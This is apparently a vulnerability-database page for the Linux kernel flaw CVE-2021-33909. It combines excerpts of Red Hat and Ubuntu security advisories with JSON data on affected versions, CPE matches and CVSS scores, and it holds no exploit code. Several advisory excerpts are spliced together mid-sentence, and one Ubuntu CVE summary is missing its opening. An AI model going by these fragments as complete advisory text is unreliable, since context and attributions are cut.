operator] Installed Clusters are missing DNS setups 1969773 - [4.8.0] Empty cluster name on handleEnsureISOErrors log after applying InfraEnv.yaml 1969784 - WebTerminal widget should send resize events 1969832 - Applying a profile with multiple inheritance where parents include a common ancestor fails 1969891 - Fix rotated pipelinerun status icon issue in safari 1969900 - Test files should not use deprecated APIs that will trigger APIRemovedInNextReleaseInUse 1969903 - Provisioning a large number of hosts results in an unexpected delay in hosts becoming available 1969951 - Cluster local doesn't work for knative services created from dev console 1969969 - ironic-rhcos-downloader container uses and old base image 1970062 - ccoctl does not work with STS authentication 1970068 - ovnkube-master logs "Failed to find node ips for gateway" error 1970126 - [4.8.0] Disable "metrics-events" when deploying using the operator 1970150 - master pool is still upgrading when machine config reports level / restarts on osimageurl change 1970262 - [4.8.0] Remove Agent CRD Status fields not needed 1970265 - [4.8.0] Add State and StateInfo to DebugInfo in ACI and Agent CRDs 1970269 - [4.8.0] missing role in agent CRD 1970271 - [4.8.0] Add ProgressInfo to Agent and AgentClusterInstalll CRDs 1970381 - Monitoring dashboards: Custom time range inputs should retain their values 1970395 - [4.8.0] SNO with AI/operator - kubeconfig secret is not created until the spoke is deployed 1970401 - [4.8.0] AgentLabelSelector is required yet not supported 1970415 - SR-IOV Docs needs documentation for disabling port security on a network 1970470 - Add pipeline annotation to Secrets which are created for a private repo 1970494 - [4.8.0] Missing value-filling of log line in assisted-service operator pod 1970624 - 4.7->4.8 updates: AggregatedAPIDown for v1beta1.metrics.k8s.io 1970828 - "500 Internal Error" for all openshift-monitoring routes 1970975 - 4.7 -> 4.8 upgrades on AWS take longer than expected 1971068 - Removing invalid AWS instances from the CF templates 1971080 - 4.7->4.8 CI: KubePodNotReady due to MCD's 5m sleep between drain attempts 1971188 - Web Console does not show OpenShift Virtualization Menu with VirtualMachine CRDs of version v1alpha3 ! 1971293 - [4.8.0] Deleting agent from one namespace causes all agents with the same name to be deleted from all namespaces 1971308 - [4.8.0] AI KubeAPI AgentClusterInstall confusing "Validated" condition about VIP not matching machine network 1971529 - [Dummy bug for robot] 4.7.14 upgrade to 4.8 and then downgrade back to 4.7.14 doesn't work - clusteroperator/kube-apiserver is not upgradeable 1971589 - [4.8.0] Telemetry-client won't report metrics in case the cluster was installed using the assisted operator 1971630 - [4.8.0] ACM/ZTP with Wan emulation fails to start the agent service 1971632 - [4.8.0] ACM/ZTP with Wan emulation, several clusters fail to step past discovery 1971654 - [4.8.0] InfraEnv controller should always requeue for backend response HTTP StatusConflict (code 409) 1971739 - Keep /boot RW when kdump is enabled 1972085 - [4.8.0] Updating configmap within AgentServiceConfig is not logged properly 1972128 - ironic-static-ip-manager container still uses 4.7 base image 1972140 - [4.8.0] ACM/ZTP with Wan emulation, SNO cluster installs do not show as installed although they are 1972167 - Several operators degraded because Failed to create pod sandbox when installing an sts cluster 1972213 - Openshift Installer| UEFI mode | BM hosts have BIOS halted 1972262 - [4.8.0] "baremetalhost.metal3.io/detached" uses boolean value where string is expected 1972426 - Adopt failure can trigger deprovisioning 1972436 - [4.8.0] [DOCS] AgentServiceConfig examples in operator.md doc should each contain databaseStorage + filesystemStorage 1972526 - [4.8.0] clusterDeployments controller should send an event to InfraEnv for backend cluster registration 1972530 - [4.8.0] no indication for missing debugInfo in AgentClusterInstall 1972565 - performance issues due to lost node, pods taking too long to relaunch 1972662 - DPDK KNI modules need some additional tools 1972676 - Requirements for authenticating kernel modules with X.509 1972687 - Using bound SA tokens causes causes failures to /apis/authorization.openshift.io/v1/clusterrolebindings 1972690 - [4.8.0] infra-env condition message isn't informative in case of missing pull secret 1972702 - [4.8.0] Domain dummy.com (not belonging to Red Hat) is being used in a default configuration 1972768 - kube-apiserver setup fail while installing SNO due to port being used 1972864 - Newlocal-with-fallback` service annotation does not preserve source IP 1973018 - Ironic rhcos downloader breaks image cache in upgrade process from 4.7 to 4.8 1973117 - No storage class is installed, OCS and CNV installations fail 1973233 - remove kubevirt images and references 1973237 - RHCOS-shipped stalld systemd units do not use SCHED_FIFO to run stalld. 1973428 - Placeholder bug for OCP 4.8.0 image release 1973667 - [4.8] NetworkPolicy tests were mistakenly marked skipped 1973672 - fix ovn-kubernetes NetworkPolicy 4.7->4.8 upgrade issue 1973995 - [Feature:IPv6DualStack] tests are failing in dualstack 1974414 - Uninstalling kube-descheduler clusterkubedescheduleroperator.4.6.0-202106010807.p0.git.5db84c5 removes some clusterrolebindings 1974447 - Requirements for nvidia GPU driver container for driver toolkit 1974677 - [4.8.0] KubeAPI CVO progress is not available on CR/conditions only in events. 1974718 - Tuned net plugin fails to handle net devices with n/a value for a channel 1974743 - [4.8.0] All resources not being cleaned up after clusterdeployment deletion 1974746 - [4.8.0] File system usage not being logged appropriately 1974757 - [4.8.0] Assisted-service deployed on an IPv6 cluster installed with proxy: agentclusterinstall shows error pulling an image from quay. 1974773 - Using bound SA tokens causes fail to query cluster resource especially in a sts cluster 1974839 - CVE-2021-29059 nodejs-is-svg: Regular expression denial of service if the application is provided and checks a crafted invalid SVG string 1974850 - [4.8] coreos-installer failing Execshield 1974931 - [4.8.0] Assisted Service Operator should be Infrastructure Operator for Red Hat OpenShift 1974978 - 4.8.0.rc0 upgrade hung, stuck on DNS clusteroperator progressing 1975155 - Kubernetes service IP cannot be accessed for rhel worker 1975227 - [4.8.0] KubeAPI Move conditions consts to CRD types 1975360 - [4.8.0] [master] timeout on kubeAPI subsystem test: SNO full install and validate MetaData 1975404 - [4.8.0] Confusing behavior when multi-node spoke workers present when only controlPlaneAgents specified 1975432 - Alert InstallPlanStepAppliedWithWarnings does not resolve 1975527 - VMware UPI is configuring static IPs via ignition rather than afterburn 1975672 - [4.8.0] Production logs are spammed on "Found unpreparing host: id 08f22447-2cf1-a107-eedf-12c7421f7380 status insufficient" 1975789 - worker nodes rebooted when we simulate a case where the api-server is down 1975938 - gcp-realtime: e2e test failing [sig-storage] Multi-AZ Cluster Volumes should only be allowed to provision PDs in zones where nodes exist [Suite:openshift/conformance/parallel] [Suite:k8s] 1975964 - 4.7 nightly upgrade to 4.8 and then downgrade back to 4.7 nightly doesn't work - ingresscontroller "default" is degraded 1976079 - [4.8.0] Openshift Installer| UEFI mode | BM hosts have BIOS halted 1976263 - [sig-cli] oc adm must-gather runs successfully for audit logs [Suite:openshift/conformance/parallel] 1976376 - disable jenkins client plugin test whose Jenkinsfile references master branch openshift/origin artifacts 1976590 - [Tracker] [SNO][assisted-operator][nmstate] Bond Interface is down when booting from the discovery ISO 1977233 - [4.8] Unable to authenticate against IDP after upgrade to 4.8-rc.1 1977351 - CVO pod skipped by workload partitioning with incorrect error stating cluster is not SNO 1977352 - [4.8.0] [SNO] No DNS to cluster API from assisted-installer-controller 1977426 - Installation of OCP 4.6.13 fails when teaming interface is used with OVNKubernetes 1977479 - CI failing on firing CertifiedOperatorsCatalogError due to slow livenessProbe responses 1977540 - sriov webhook not worked when upgrade from 4.7 to 4.8 1977607 - [4.8.0] Post making changes to AgentServiceConfig assisted-service operator is not detecting the change and redeploying assisted-service pod 1977924 - Pod fails to run when a custom SCC with a specific set of volumes is used 1980788 - NTO-shipped stalld can segfault 1981633 - enhance service-ca injection 1982250 - Performance Addon Operator fails to install after catalog source becomes ready 1982252 - olm Operator is in CrashLoopBackOff state with error "couldn't cleanup cross-namespace ownerreferences"

  1. References:

https://access.redhat.com/security/cve/CVE-2016-2183 https://access.redhat.com/security/cve/CVE-2020-7774 https://access.redhat.com/security/cve/CVE-2020-15106 https://access.redhat.com/security/cve/CVE-2020-15112 https://access.redhat.com/security/cve/CVE-2020-15113 https://access.redhat.com/security/cve/CVE-2020-15114 https://access.redhat.com/security/cve/CVE-2020-15136 https://access.redhat.com/security/cve/CVE-2020-26160 https://access.redhat.com/security/cve/CVE-2020-26541 https://access.redhat.com/security/cve/CVE-2020-28469 https://access.redhat.com/security/cve/CVE-2020-28500 https://access.redhat.com/security/cve/CVE-2020-28852 https://access.redhat.com/security/cve/CVE-2021-3114 https://access.redhat.com/security/cve/CVE-2021-3121 https://access.redhat.com/security/cve/CVE-2021-3516 https://access.redhat.com/security/cve/CVE-2021-3517 https://access.redhat.com/security/cve/CVE-2021-3518 https://access.redhat.com/security/cve/CVE-2021-3520 https://access.redhat.com/security/cve/CVE-2021-3537 https://access.redhat.com/security/cve/CVE-2021-3541 https://access.redhat.com/security/cve/CVE-2021-3636 https://access.redhat.com/security/cve/CVE-2021-20206 https://access.redhat.com/security/cve/CVE-2021-20271 https://access.redhat.com/security/cve/CVE-2021-20291 https://access.redhat.com/security/cve/CVE-2021-21419 https://access.redhat.com/security/cve/CVE-2021-21623 https://access.redhat.com/security/cve/CVE-2021-21639 https://access.redhat.com/security/cve/CVE-2021-21640 https://access.redhat.com/security/cve/CVE-2021-21648 https://access.redhat.com/security/cve/CVE-2021-22133 https://access.redhat.com/security/cve/CVE-2021-23337 https://access.redhat.com/security/cve/CVE-2021-23362 https://access.redhat.com/security/cve/CVE-2021-23368 https://access.redhat.com/security/cve/CVE-2021-23382 https://access.redhat.com/security/cve/CVE-2021-25735 https://access.redhat.com/security/cve/CVE-2021-25737 https://access.redhat.com/security/cve/CVE-2021-26539 https://access.redhat.com/security/cve/CVE-2021-26540 https://access.redhat.com/security/cve/CVE-2021-27292 https://access.redhat.com/security/cve/CVE-2021-28092 https://access.redhat.com/security/cve/CVE-2021-29059 https://access.redhat.com/security/cve/CVE-2021-29622 https://access.redhat.com/security/cve/CVE-2021-32399 https://access.redhat.com/security/cve/CVE-2021-33034 https://access.redhat.com/security/cve/CVE-2021-33194 https://access.redhat.com/security/cve/CVE-2021-33909 https://access.redhat.com/security/updates/classification/#moderate

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYQCOF9zjgjWX9erEAQjsEg/+NSFQdRcZpqA34LWRtxn+01y2MO0WLroQ d4o+3h0ECKYNRFKJe6n7z8MdmPpvV2uNYN0oIwidTESKHkFTReQ6ZolcV/sh7A26 Z7E+hhpTTObxAL7Xx8nvI7PNffw3CIOZSpnKws5TdrwuMkH5hnBSSZntP5obp9Vs ImewWWl7CNQtFewtXbcmUojNzIvU1mujES2DTy2ffypLoOW6kYdJzyWubigIoR6h gep9HKf1X4oGPuDNF5trSdxKwi6W68+VsOA25qvcNZMFyeTFhZqowot/Jh1HUHD8 TWVpDPA83uuExi/c8tE8u7VZgakWkRWcJUsIw68VJVOYGvpP6K/MjTpSuP2itgUX X//1RGQM7g6sYTCSwTOIrMAPbYH0IMbGDjcS4fSZcfg6c+WJnEpZ72ZgjHZV8mxb 1BtQSs2lil48/cwDKM0yMO2nYsKiz4DCCx2W5izP0rLwNA8Hvqh9qlFgkxJWWOvA mtBCelB0E74qrE4NXbX+MIF7+ZQKjd1evE91/VWNs0FLR/xXdP3C5ORLU3Fag0G/ 0oTV73NdxP7IXVAdsECwU2AqS9ne1y01zJKtd7hq7H/wtkbasqCNq5J7HikJlLe6 dpKh5ZRQzYhGeQvho9WQfz/jd4HZZTcB6wxrWubbd05bYt/i/0gau90LpuFEuSDx +bLvJlpGiMg= =NJcM -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 20.04 LTS
  • Ubuntu 18.04 LTS
  • Ubuntu 16.04 ESM
  • Ubuntu 14.04 ESM

Summary

Several security issues were fixed in the kernel. An attacker in a guest VM could use this to write to portions of the host’s physical memory. (CVE-2021-3653)

Maxim Levitsky and Paolo Bonzini discovered that the KVM hypervisor implementation for AMD processors in the Linux kernel allowed a guest VM to disable restrictions on VMLOAD/VMSAVE in a nested guest. An attacker in a guest VM could use this to read or write portions of the host’s physical memory. (CVE-2021-3656)

Andy Nguyen discovered that the netfilter subsystem in the Linux kernel contained an out-of-bounds write in its setsockopt() implementation. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-22555)

It was discovered that the virtual file system implementation in the Linux kernel contained an unsigned to signed integer conversion error. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-33909)

Update instructions

The problem can be corrected by updating your kernel livepatch to the following versions:

Ubuntu 20.04 LTS gcp - 81.1 generic - 81.1 gke - 81.1 gkeop - 81.1 lowlatency - 81.1

Ubuntu 18.04 LTS generic - 81.1 gke - 81.1 gkeop - 81.1 lowlatency - 81.1 oem - 81.1

Ubuntu 16.04 ESM generic - 81.1 lowlatency - 81.1

Ubuntu 14.04 ESM generic - 81.1 lowlatency - 81.1

Support Information

Kernels older than the levels listed below do not receive livepatch updates. If you are running a kernel version earlier than the one listed below, please upgrade your kernel as soon as possible.

Ubuntu 20.04 LTS linux-aws - 5.4.0-1009 linux-azure - 5.4.0-1010 linux-gcp - 5.4.0-1009 linux-gke - 5.4.0-1033 linux-gkeop - 5.4.0-1009 linux-oem - 5.4.0-26 linux - 5.4.0-26

Ubuntu 18.04 LTS linux-aws - 4.15.0-1054 linux-gke-4.15 - 4.15.0-1076 linux-gke-5.4 - 5.4.0-1009 linux-gkeop-5.4 - 5.4.0-1007 linux-hwe-5.4 - 5.4.0-26 linux-oem - 4.15.0-1063 linux - 4.15.0-69

Ubuntu 16.04 ESM linux-aws - 4.4.0-1098 linux-azure - 4.15.0-1063 linux-azure - 4.15.0-1078 linux-hwe - 4.15.0-69 linux - 4.4.0-168 linux - 4.4.0-211

Ubuntu 14.04 ESM linux-lts-xenial - 4.4.0-168

References

  • CVE-2021-3653
  • CVE-2021-3656
  • CVE-2021-22555
  • CVE-2021-33909

-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202107-1361",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.134"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.52"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.276"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.5"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.13.4"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12.19"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.13"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "34"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.276"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.240"
      },
      {
        "model": "sma1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "sonicwall",
        "version": "12.4.2-02044"
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "9.0"
      },
      {
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.2"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.12.43"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.198"
      },
      {
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.4"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.3"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.52",
                "versionStartIncluding": "5.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.12.19",
                "versionStartIncluding": "5.11",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.13.4",
                "versionStartIncluding": "5.13",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.13",
                "versionStartIncluding": "3.12.43",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.276",
                "versionStartIncluding": "3.16",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.276",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.240",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.198",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.4.134",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:8.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:sonicwall:sma1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "12.4.2-02044",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:sonicwall:sma1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "db": "PACKETSTORM",
        "id": "163690"
      }
    ],
    "trust": 0.8
  },
  "cve": "CVE-2021-33909",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2021-33909",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-33909",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-33909",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05. 8.1) - ppc64le, x86_64\n\n3. Description:\n\nThis is a kernel live patch module which is automatically loaded by the RPM\npost-install script to modify the code of a running kernel. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 7.7) - ppc64, ppc64le, x86_64\n\n3. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nBug Fix(es):\n\n* [RHEL7.9.z] n_tty_open: \"BUG: unable to handle kernel paging request\"\n(BZ#1872778)\n\n* [ESXi][RHEL7.8]\"qp_alloc_hypercall result = -20\" / \"Could not attach to\nqueue pair with -20\" with vSphere Fault Tolerance enabled (BZ#1892237)\n\n* [RHEL7.9][s390x][Regression] Sino Nomine swapgen IBM z/VM emulated 